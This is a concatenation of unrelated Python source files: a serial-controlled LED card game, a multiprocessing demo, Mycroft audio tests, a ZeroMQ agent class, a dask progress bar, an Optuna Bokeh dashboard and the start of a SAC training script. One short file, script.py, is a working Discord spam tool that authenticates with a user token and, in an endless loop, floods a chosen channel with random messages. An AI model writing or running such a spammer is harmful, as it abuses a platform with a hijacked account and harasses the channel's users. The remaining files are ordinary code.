p2 = Player("COM", 9.99, total_card[28:56],2)
def check_cards():
global present_sum, TAKE
if 5 in present_sum:
TAKE = 1
else:
TAKE = 0
def update_label_remaining(): # should eventually be shown on the LED instead of printed
global p1,p2,p3,p4,present_total_card,present_sum
print("p1:",len(p1.hand_cards))
print("p2:",len(p2.hand_cards))
print("p3:",len(p3.hand_cards))
print("p4:",len(p4.hand_cards))
########################################################################################
def gamesetlose():
global p1,p2,p3,p4, player_list
if len(p1.hand_cards) == 0 and p1.live == True:
print("p1 lose")
player_list.remove(p1)
for i in range(8):
for j in range(16):
LED.screen[i][j] = 0
p1.live = False
p1.card = None
if len(p2.hand_cards) == 0 and p2.live == True:
print("p2 lose")
player_list.remove(p2)
for i in range(8):
for j in range(16):
LED.screen[i][j+16] = 0
p2.live = False
p2.card = None
if len(p3.hand_cards) == 0 and p3.live == True:
print("p3 lose")
player_list.remove(p3)
for i in range(8):
for j in range(16):
LED.screen[i+8][j] = 0
p3.live = False
p3.card = None
if len(p4.hand_cards) == 0 and p4.live == True:
print("p4 lose")
player_list.remove(p4)
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16] = 0
p4.live = False
p4.card = None
##################################################################
def lose():
global p1,p2,p3,p4, player_list
if len(p1.hand_cards) == 0 and p1.live == True:
print("p1 lose")
player_list.remove(p1)
for i in range(8):
for j in range(16):
LED.screen[i][j] = 0
p1.live = False
if(p1.card != None):
present_sum[p1.card.color-1] = present_sum[p1.card.color-1] - p1.card.count
p1.card = None
if len(p2.hand_cards) == 0 and p2.live == True:
print("p2 lose")
player_list.remove(p2)
for i in range(8):
for j in range(16):
LED.screen[i][j+16] = 0
p2.live = False
if (p2.card != None):
present_sum[p2.card.color-1] = present_sum[p2.card.color-1] - p2.card.count
p2.card = None
if len(p3.hand_cards) == 0 and p3.live == True:
print("p3 lose")
player_list.remove(p3)
for i in range(8):
for j in range(16):
LED.screen[i+8][j] = 0
p3.live = False
if(p3.card != None):
present_sum[p3.card.color-1] = present_sum[p3.card.color-1] - p3.card.count
p3.card = None
if len(p4.hand_cards) == 0 and p4.live == True:
print("p4 lose")
player_list.remove(p4)
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16] = 0
p4.live = False
if(p4.card != None):
present_sum[p4.card.color-1] = present_sum[p4.card.color-1] - p4.card.count
p4.card = None
flag=0
flag_1 = 0
flag_2 = 0
flag_3 = 0
flag_4 = 0
t1 = 0
t2 = 0
t3 = 0
t4 = 0
p1_ready = p2_ready = p3_ready = p4_ready = False
def ser_input():
global ser_who, time1, t1, t2, t3, t4, check, ready_state, p1_ready, p2_ready, p3_ready, p4_ready
ser_who = -1
    global flag, flag_1, flag_2, flag_3, flag_4
if ready_state == False:
t=9999
else:
t=1
while time.time() - time1 < t :
if ser.readable():
read = ser.readline()
read2 = read.decode('utf8', 'ignore')[:len(read)-1].split()
if(len(read2) < 4):
continue
if ready_state == False:
if int(read2[0]) > 30:
p1_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j]=1
if int(read2[1]) > 30:
p2_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+8]=2
if int(read2[2]) > 30:
p3_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+16]=3
if int(read2[3]) > 30:
p4_ready = True
for i in range(4):
for j in range(8):
LED.screen[i+12][j+24]=4
if(p1_ready == True and p2_ready == True and p3_ready == True and p4_ready == True):
flag=1
ready_state=True
return
else:
if int(read2[0])+int(read2[1])+int(read2[2])+int(read2[3])<30:
flag=0
if int(read2[0])> 100 and flag==0 and p1.live==True:
if int(read2[0])>750:
chk=1
t1 = time.time() - time1
ser_who = 1
flag=1
break
if int(read2[1])> 100 and flag==0 and p2.live==True:
if int(read2[1])>750:
chk=1
t2 = time.time() - time1
ser_who = 2
flag=1
break
if int(read2[2])> 100 and flag==0 and p3.live==True:
if int(read2[2])>750:
chk=1
t3 = time.time() - time1
ser_who = 3
flag=1
break
if int(read2[3])> 100 and flag==0 and p4.live==True:
if int(read2[3])>750:
chk=1
t4 = time.time() - time1
ser_who = 4
flag=1
break
def keyboard_input():
global card1, card2, card3, card4
global present_surface_card, present_sum, present_total_card, player_list
global TAKE, who, ser_who, time1, t1, t2, t3, t4
#time1 = time.time()
ser_input()
if (ser_who == 1 and p1.live==True):
if (TAKE == 1):
p1.time = round(min(float(t1), p1.time),3)
print(p1.time)
p1.hand_cards = present_total_card + p1.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_1)
gamesetlose()
elif TAKE == 0:
if len(p1.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p1):
continue
player_list[i].hand_cards.insert(0, p1.hand_cards.pop())
printbadgameset(num_1)
else:
p1.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p1.live==True:
who = player_list.index(p1)
elif (ser_who == 2 and p2.live==True):
if (TAKE == 1):
p2.time = round(min(float(t2),p2.time),3)
print(p2.time)
p2.hand_cards = present_total_card + p2.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_2)
gamesetlose()
elif TAKE == 0:
if len(p2.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p2):
continue
player_list[i].hand_cards.insert(0, p2.hand_cards.pop())
printbadgameset(num_2)
else:
p2.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p2.live==True:
who = player_list.index(p2)
elif (ser_who == 3 and p3.live==True):
if (TAKE == 1):
p3.time = round(min(p3.time,float(t3)) ,3)
print(p3.time)
p3.hand_cards = present_total_card + p3.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_3)
gamesetlose()
# clean_cards()
elif TAKE == 0:
if len(p3.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p3):
continue
player_list[i].hand_cards.insert(0, p3.hand_cards.pop())
printbadgameset(num_3)
else:
p3.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p3.live==True:
who = player_list.index(p3)
elif (ser_who == 4 and p4.live==True):
if (TAKE == 1):
p4.time = round(min(float(t4),p4.time), 3)
print(p4.time)
p4.hand_cards = present_total_card + p4.hand_cards
present_total_card = []
present_surface_card = [[], [], [], []]
present_sum = np.asarray([0, 0, 0, 0])
TAKE = 0
if(len(p1.hand_cards) != 0): p1.card = None
if(len(p2.hand_cards) != 0): p2.card = None
if(len(p3.hand_cards) != 0): p3.card = None
if(len(p4.hand_cards) != 0): p4.card = None
printgoodgameset(num_4)
gamesetlose()
elif TAKE == 0:
if len(p4.hand_cards) > len(player_list)-1:
for i in range(len(player_list)):
if i == player_list.index(p4):
continue
player_list[i].hand_cards.insert(0, p4.hand_cards.pop())
printbadgameset(num_4)
else:
p4.hand_cards = []
lose()
check_cards()
update_label_remaining()
if p4.live==True:
who = player_list.index(p4)
elif ser_who == -1:
who = -1
#elif ser_who==4 and p4.live==False:
# who= -1
React=[]
file_line=[]
def react():
global p1,p2,p3,p4
global React, file_line
text_file = open("test.txt", "r")
file_line=text_file.readlines()
React.append(p1.time)
React.append(p2.time)
React.append(p3.time)
React.append(p4.time)
txt_line=file_line
for i in range(4):
for j in range(10):
if file_line[j][0]!='P':
continue
elif React[i]<float(file_line[j][3:8]):
txt_line.insert(j,'P'+str(i+1)+' '+str(React[i])+'\n')
del file_line[10]
break
text_file = open("test.txt", "w")
for i in range(10):
data=txt_line[i]
text_file.write(data)
React=[]
def main():
global card1, card2, card3, card4
global present_surface_card, present_sum, present_total_card
global TAKE, who, ready_state, time1
LED_init()
initCard()
    initPlayer(0) # mode 0: four-player game (the required mode argument was missing)
time1 = time.time()
####################################### START READY ##############################################
write1([P,R,E,S,S],5)
write2([T,O,SP,S,T,A,R,T],5)
ready_state=False
ser_input()
time.sleep(2)
LED.screen = [[0 for x in range(32)] for x in range(16)]
write1([SP,SP,A,L,L],5)
write2([SP,R,E,A,D,Y,ex],5)
time.sleep(2)
#LED.screen = [[0 for x in range(32)] for x in range(16)]
####################################### END READY ##############################################
    LED.screen = [[0 for x in range(32)] for x in range(16)] # clear the LED before the game starts
    who = 0 # who: index into player_list of the player whose turn it is; starts at 0
    while True: # main game loop
        if(len(player_list) == 1): # end condition: only one player remains
react()
sys.exit()
if(who != -1): i = who
player_list[i].output()
        check_cards() # if any symbol count reaches 5, set TAKE = 1
        # if(a specific key is pressed):
        # update_label_remaining() # on key press, show the remaining card counts on the LED
        keyboard_input() # returns the index of the player who rang the bell
        if(who == -1): # nobody rang the bell
            i = (i+1)%len(player_list) # move on to the next player
            if(i>len(player_list)): # player_list shrinks when someone is eliminated; account for that
i = i-1
else:
            i = who # someone rang the bell, so it's that player's index next
if __name__ == '__main__':
main()
|
chatb_process.py
|
__author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '8/4/2020 11:30 AM'
from multiprocessing import Process
lis = []
def foo(i):
lis.append(i)
print("This is Process ", i, " and lis is ", lis, " and lis.address is ", id(lis))
if __name__ == '__main__':
for i in range(5):
p = Process(target=foo, args=(i,))
p.start()
print("The end of list_1:", lis)
|
test_utils.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import unittest.mock as mock
from shutil import rmtree
from threading import Thread
from time import sleep
from os.path import exists
import mycroft.audio
from mycroft.util import create_signal, check_for_signal
from mycroft.util.file_utils import get_temp_path
"""Tests for public audio service utils."""
done_waiting = False
def wait_while_speaking_thread():
global done_waiting
mycroft.audio.wait_while_speaking()
done_waiting = True
class TestInterface(unittest.TestCase):
def setUp(self):
if exists(get_temp_path('mycroft')):
rmtree(get_temp_path('mycroft'))
def test_is_speaking(self):
create_signal('isSpeaking')
self.assertTrue(mycroft.audio.is_speaking())
# Check that the signal hasn't been removed
self.assertTrue(check_for_signal('isSpeaking'))
self.assertFalse(mycroft.audio.is_speaking())
def test_wait_while_speaking(self):
# Check that test terminates
create_signal('isSpeaking')
Thread(target=wait_while_speaking_thread).start()
sleep(2)
self.assertFalse(done_waiting)
check_for_signal('isSpeaking')
sleep(2)
self.assertTrue(done_waiting)
@mock.patch('mycroft.audio.utils.is_speaking')
@mock.patch('mycroft.messagebus.send_func.send')
def test_stop_speaking(self, mock_send, mock_is_speaking):
"""Test that stop speak message is sent."""
mock_is_speaking.return_value = True
mycroft.audio.stop_speaking()
mock_send.assert_called_with('mycroft.audio.speech.stop')
@mock.patch('mycroft.audio.utils.is_speaking')
@mock.patch('mycroft.messagebus.send_func.send')
def test_stop_speaking_when_not(self, mock_send, mock_is_speaking):
"""Check that the stop speaking msg isn't sent when not speaking."""
mock_is_speaking.return_value = False
mycroft.audio.stop_speaking()
mock_send.assert_not_called()
if __name__ == "__main__":
unittest.main()
|
agent.py
|
import logging
import os
import queue
import threading
import time
import traceback
import uuid
from signal import SIGINT, SIGTERM, signal
import zmq
from pyrsistent import pmap
from rx.subject import Subject
from .mixins import (
AuthenticationMixin,
NotificationsMixin,
RouterClientMixin,
WebserverMixin,
)
from .utils import Logger, stdout_logger
log = stdout_logger(__name__, level=logging.DEBUG)
class Agent(RouterClientMixin, NotificationsMixin, AuthenticationMixin, WebserverMixin):
def __init__(self, *args, name=None, **kwargs):
self.name = name or uuid.uuid4().hex
self.log = Logger(log, {"agent": self.name})
self.initialized_event = threading.Event()
self.exit_event = threading.Event()
self.zmq_sockets = {}
self.zmq_poller = zmq.Poller()
self.threads = []
self.disposables = []
# signals for graceful shutdown
signal(SIGTERM, self._shutdown)
signal(SIGINT, self._shutdown)
# boot in thread
t = threading.Thread(target=self.boot, args=args, kwargs=kwargs)
self.threads.append(t)
t.start()
self.initialized_event.wait()
# call initialized hook
self.initialized()
def setup(self):
"""
User override
"""
def initialized(self):
"""
User override
"""
def boot(self, *args, **kwargs):
try:
start = time.time()
self.log.info("Booting up ...")
self.zmq_context = zmq.Context()
# user setup
self.log.info("Running user setup ...")
self.setup(*args, **kwargs)
# setup bases
for base in Agent.__bases__:
if hasattr(base, "setup"):
self.log.info(f"Initiating {base.__name__} setup procedure")
base.setup(self, *args, **kwargs)
# process sockets
t = threading.Thread(target=self.process_sockets)
self.threads.append(t)
t.start()
self.initialized_event.set()
self.log.info(f"Booted in {time.time() - start} seconds ...")
except Exception as e:
self.log.error(f"Failed to boot ...\n\n{traceback.format_exc()}")
self.initialized_event.set()
os.kill(os.getpid(), SIGINT)
def shutdown(self):
"""
Shutdown procedure, call super().shutdown() if overriding
"""
# run shutdown procedures of all bases
for base in Agent.__bases__:
if hasattr(base, "shutdown"):
self.log.info(f"Initiating {base.__name__} shutdown procedure")
base.shutdown(self)
# dispose observables
for d in self.disposables:
self.log.info(f"disposing {d} ...")
d.dispose()
self.log.info("set exit event ...")
self.exit_event.set()
self.log.info("wait for initialization before cleaning up ...")
self.initialized_event.wait()
# join threads
self.log.info("joining threads ...")
for t in self.threads:
self.log.info(f"joining {t}")
t.join()
self.log.info("joining threads complete ...")
# destroy zmq sockets
for k, v in self.zmq_sockets.items():
self.log.info(f"closing socket {k} ...")
v["socket"].close()
self.zmq_context.term()
def _shutdown(self, signum, frame):
self.shutdown()
########################################################################################
## networking
########################################################################################
def bind_socket(self, socket_type, options, address):
self.log.info(f"binding {socket_type} socket on {address} ...")
socket = self.zmq_context.socket(socket_type)
for k, v in options.items():
if type(v) == str:
socket.setsockopt_string(k, v)
else:
socket.setsockopt(k, v)
socket.bind(address)
observable = Subject()
socket_name = f"{socket_type}:{address}"
send_queue = queue.Queue()
self.zmq_sockets[socket_name] = pmap(
{
"socket": socket,
"address": address,
"type": socket_type,
"options": options,
"observable": observable,
"send_queue": send_queue,
"send": lambda x: send_queue.put(x),
}
)
self.zmq_poller.register(socket, zmq.POLLIN)
return self.zmq_sockets[socket_name]
def connect_socket(self, socket_type, options, address):
self.log.info(f"connecting {socket_type} socket to {address} ...")
socket = self.zmq_context.socket(socket_type)
for k, v in options.items():
if type(v) == str:
socket.setsockopt_string(k, v)
else:
socket.setsockopt(k, v)
socket.connect(address)
observable = Subject()
socket_name = f"{socket_type}:{address}"
send_queue = queue.Queue()
self.zmq_sockets[socket_name] = pmap(
{
"socket": socket,
"address": address,
"type": socket_type,
"options": options,
"observable": observable,
"send_queue": send_queue,
"send": lambda x: send_queue.put(x),
}
)
self.zmq_poller.register(socket, zmq.POLLIN)
return self.zmq_sockets[socket_name]
def process_sockets(self):
# wait for initialization
self.initialized_event.wait()
self.log.info(
f"start processing sockets in thread {threading.current_thread()} ..."
)
while not self.exit_event.is_set():
if self.zmq_sockets:
sockets = dict(self.zmq_poller.poll(50))
for k, v in self.zmq_sockets.items():
# receive socket into observable
if v.socket in sockets and sockets[v.socket] == zmq.POLLIN:
v.observable.on_next(v.socket.recv_multipart())
# send queue to socket (zmq is not thread safe)
while not v.send_queue.empty() and not self.exit_event.is_set():
try:
v.socket.send_multipart(v.send_queue.get(block=False))
except queue.Empty:
pass
else:
time.sleep(1)
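# --- Hedged usage sketch (illustrative only, not part of the module) ----------
# A minimal Agent subclass: setup() binds a PULL socket and subscribes to its
# observable so every received multipart message is logged. The address is a
# placeholder and the socket options are left empty.
class EchoAgent(Agent):
    def setup(self, address="tcp://127.0.0.1:5555"):
        pull = self.bind_socket(zmq.PULL, {}, address)
        self.disposables.append(
            pull["observable"].subscribe(
                lambda frames: self.log.info(f"received {frames}")
            )
        )
# Example: agent = EchoAgent(name="echo"); ...; agent.shutdown()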
|
dask_util.py
|
# -*- coding: utf-8 -*-
from collections import defaultdict
from timeit import default_timer
from threading import Event, Thread, Lock
import os
import time
import sys
try:
from dask.callbacks import Callback
from dask.utils import ignoring
except ImportError as e:
opt_import_err = e
Callback = object
else:
opt_import_err = None
from africanus.util.docs import DefaultOut
from africanus.util.requirements import requires_optional
def format_time(t):
"""Format seconds into a human readable form."""
m, s = divmod(t, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
w, d = divmod(d, 7)
if w:
return "{0:2.0f}w{1:2.0f}d".format(w, d)
elif d:
return "{0:2.0f}d{1:2.0f}h".format(d, h)
elif h:
return "{0:2.0f}h{1:2.0f}m".format(h, m)
elif m:
return "{0:2.0f}m{1:2.0f}s".format(m, s)
else:
return "{0:5.0f}s".format(s)
def key_bin(key):
if type(key) == tuple:
key = key[0]
if type(key) == bytes:
key = key.decode()
try:
return str(key)
except Exception:
return "other"
class TaskData(object):
__slots__ = ("total", "completed", "time_sum")
def __init__(self, completed=0, total=0, time_sum=0.0):
self.completed = completed
self.total = total
self.time_sum = time_sum
def __iadd__(self, other):
self.completed += other.completed
self.total += other.total
self.time_sum += other.time_sum
return self
def __add__(self, other):
return TaskData(self.completed + other.completed,
self.total + other.total,
self.time_sum + other.time_sum)
def __repr__(self):
return "TaskData(%s, %s, %s)" % (self.completed,
self.total,
self.time_sum)
__str__ = __repr__
def update_bar(elapsed, prev_completed, prev_estimated, pb):
total = 0
completed = 0
estimated = 0.0
time_guess = 0.0
# update
with pb._lock:
for k, v in pb.task_data.items():
total += v.total
completed += v.completed
if v.completed > 0:
avg_time = v.time_sum / v.completed
estimated += avg_time * v.total
time_guess += v.time_sum
# If we've completed some new tasks, update our estimate
# otherwise use previous estimate. This prevents jumps
# relative to the elapsed time
if completed != prev_completed:
estimated = estimated * elapsed / time_guess
else:
estimated = prev_estimated
# For the first 10 seconds, tell the user estimates improve over time
# then display the bar
if elapsed < 10.0:
fraction = 0.0
bar = " estimate improves over time"
else:
# Print out the progress bar
fraction = elapsed / estimated if estimated > 0.0 else 0.0
bar = "#" * int(pb._width * fraction)
percent = int(100 * fraction)
msg = "\r[{0:{1}.{1}}] | {2}% Complete (Estimate) | {3} / ~{4}".format(
bar, pb._width, percent,
format_time(elapsed),
"???" if estimated == 0.0 else format_time(estimated))
with ignoring(ValueError):
pb._file.write(msg)
pb._file.flush()
return completed, estimated
def timer_func(pb):
start = default_timer()
while pb.running.is_set():
elapsed = default_timer() - start
prev_completed = 0
prev_estimated = 0.0
if elapsed > pb._minimum:
prev_completed, prev_estimated = update_bar(elapsed,
prev_completed,
prev_estimated,
pb)
time.sleep(pb._dt)
default_out = DefaultOut("sys.stdout")
class EstimatingProgressBar(Callback):
"""
Progress Bar that displays elapsed time as well as an
estimate of total time taken.
When starting a dask computation,
the bar examines the graph and determines
the number of chunks contained by a dask collection.
    During computation, the number of completed chunks and
    the total time taken to complete them are
    tracked. The averages derived from these numbers are
    used to estimate total compute time, relative to
    the current elapsed time.
    The bar is not particularly accurate: it will
    underestimate near the beginning of computation
    and tends to slightly overestimate during the
    bulk of computation. However, it may be more accurate
    than the default dask task bar, which tracks the
    number of tasks completed out of the total number of tasks.
Parameters
----------
minimum : int, optional
Minimum time threshold in seconds before displaying a progress bar.
Default is 0 (always display)
width : int, optional
Width of the bar, default is 42 characters.
dt : float, optional
Update resolution in seconds, default is 1.0 seconds.
"""
@requires_optional("dask", opt_import_err)
def __init__(self, minimum=0, width=42, dt=1.0, out=default_out):
if out is None:
out = open(os.devnull, "w")
elif out is default_out:
out = sys.stdout
self._minimum = minimum
self._width = width
self._dt = dt
self._file = out
self._lock = Lock()
def _start(self, dsk):
self.task_start = {}
self.task_data = defaultdict(TaskData)
for k, v in dsk.items():
self.task_data[key_bin(k)].total += 1
self.running = Event()
self.running.set()
self.thread = Thread(target=timer_func, args=(self,))
        self.thread.daemon = True
self.thread.start()
def _finish(self, dsk, state, errored):
self.running.clear()
self.task_data.clear()
self.task_start.clear()
def _pretask(self, key, dsk, state):
with self._lock:
self.task_start[key] = default_timer()
def _posttask(self, key, result, dsk, state, worker_id):
with self._lock:
td = self.task_data[key_bin(key)]
td.time_sum += default_timer() - self.task_start.pop(key)
td.completed += 1
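# --- Hedged usage sketch (illustrative only, not part of the module) ----------
# The callback behaves like any other dask callback and can be used as a
# context manager around a compute call. The dask.array computation below is a
# placeholder workload.
def _example_progress_bar():
    import dask.array as da
    x = da.random.random((8000, 8000), chunks=(1000, 1000))
    with EstimatingProgressBar(minimum=0, dt=0.5):
        x.dot(x.T).sum().compute()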
|
dashboard.py
|
import collections
import threading
import time
import numpy as np
from optuna._imports import try_import
import optuna.logging
import optuna.study
from optuna.study import StudyDirection
import optuna.trial
from optuna import type_checking
if type_checking.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
with try_import() as _imports:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = """
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
"""
_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
if _imports.is_successful():
class _CompleteTrialsWidget(object):
def __init__(self, trials, direction):
# type: (List[optuna.trial.FrozenTrial], StudyDirection) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.trial.TrialState.COMPLETE
]
self.trial_ids = set([trial._trial_id for trial in complete_trials])
self.direction = direction
values = [trial.value for trial in complete_trials]
if direction == StudyDirection.MINIMIZE:
best_values = np.minimum.accumulate(values, axis=0)
else:
best_values = np.maximum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource(
{
"#": list(range(len(complete_trials))),
"value": values,
"best_value": best_values,
}
)
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x="#", y="value", source=self.cds, alpha=0.3, color="navy")
figure.line(x="#", y="best_value", source=self.cds, color="firebrick")
figure.xaxis[0].axis_label = "Number of Trials"
figure.yaxis[0].axis_label = "Objective Value"
return figure
def update(self, new_trials):
# type: (List[optuna.trial.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.trial.TrialState.COMPLETE:
continue
if trial._trial_id in self.trial_ids:
continue
stream_dict["#"].append(len(self.trial_ids))
stream_dict["value"].append(trial.value)
if self.direction == StudyDirection.MINIMIZE:
self.best_value = min(self.best_value, trial.value)
else:
self.best_value = max(self.best_value, trial.value)
stream_dict["best_value"].append(self.best_value)
self.trial_ids.add(trial._trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.trial.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field)
for field in [
"number",
"state",
"value",
"params",
"datetime_start",
"datetime_complete",
]
],
)
def update(
self,
old_trials, # type: List[optuna.trial.FrozenTrial]
new_trials, # type: List[optuna.trial.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials) :]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.trial.FrozenTrial]) -> Dict[str, List[Any]]
return {
"number": [trial.number for trial in trials],
"state": [trial.state.name for trial in trials],
"value": [trial.value for trial in trials],
"params": [str(trial.params) for trial in trials],
"datetime_start": [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None
else None
for trial in trials
],
"datetime_complete": [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None
else None
for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = (
self.study.trials
) # type: Optional[List[optuna.trial.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.trial.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(
self.current_trials, self.study.direction
)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = "Optuna Dashboard (Beta)"
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout(
[
[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()],
],
sizing_mode="scale_width",
)
)
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = self.new_trials is None
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning("Optuna dashboard is still highly experimental. Please use with caution!")
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith(".pyc"):
path = path[:-1]
return path
def _serve(study, bokeh_allow_websocket_origins):
# type: (optuna.study.Study, List[str]) -> None
global _mode, _study
_imports.check()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = "serve"
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
    # instantiate and launch `bokeh.server.server.Server` ourselves. However, in that case,
    # for some reason, we found that the CDS update is not reflected in browsers, at least on Bokeh
    # version 0.12.15. In addition, we would need to do a lot of server configuration, which is
    # handled automatically by the single line below. So, for now, we decided to use this approach.
command = ["bokeh", "serve", "--show", _get_this_source_path()]
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(["--allow-websocket-origin", bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def _write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_imports.check()
_show_experimental_warning()
_mode = "html"
_study = study
bokeh.command.bootstrap.main(["bokeh", "html", _get_this_source_path(), "-o", out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == "serve"))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith("bk_script_"):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
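# --- Hedged usage sketch (illustrative only, relying on the private helpers above):
# build a tiny study and hand it to _serve, which shells out to `bokeh serve`.
# The websocket origin matches Bokeh's default port and is just an example.
def _example_dashboard():
    # type: () -> None
    study = optuna.create_study()
    study.optimize(lambda trial: trial.suggest_uniform("x", -10, 10) ** 2, n_trials=20)
    _serve(study, bokeh_allow_websocket_origins=["localhost:5006"])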
|
script.py
|
import requests
import time
import random
import threading
TOKEN = ""
CHANNEL = 000000000000
DELAY = 3
AMOUNT = 4
def random_chars() -> str:
return "".join(random.choice("abcdefghijklmnopqrstuvwxyz") for i in range(0, random.randint(1, 20)))
def spam_channel(token: str, channel_id=str, content=str, delay=float, amount=int) -> None:
base_url = f"https://canary.discord.com/api/v9/channels/{channel_id}/messages"
headers = {"Authorization": token}
data = {"content": content}
for _ in range(amount):
r = requests.post(base_url, headers=headers, data=data)
if r.status_code != 200:
print(f"Error: {r.status_code} | {r.text}")
time.sleep(delay)
while True:
thread = threading.Thread(target=spam_channel(TOKEN, CHANNEL, random_chars(), DELAY, AMOUNT))
thread.start()
|
sac.py
|
"""Author: Brandon Trabucco, Copyright 2019, MIT License"""
import multiprocessing
from cs285.baselines.off_policy.sac import SAC
from gym.envs.mujoco.half_cheetah import HalfCheetahEnv
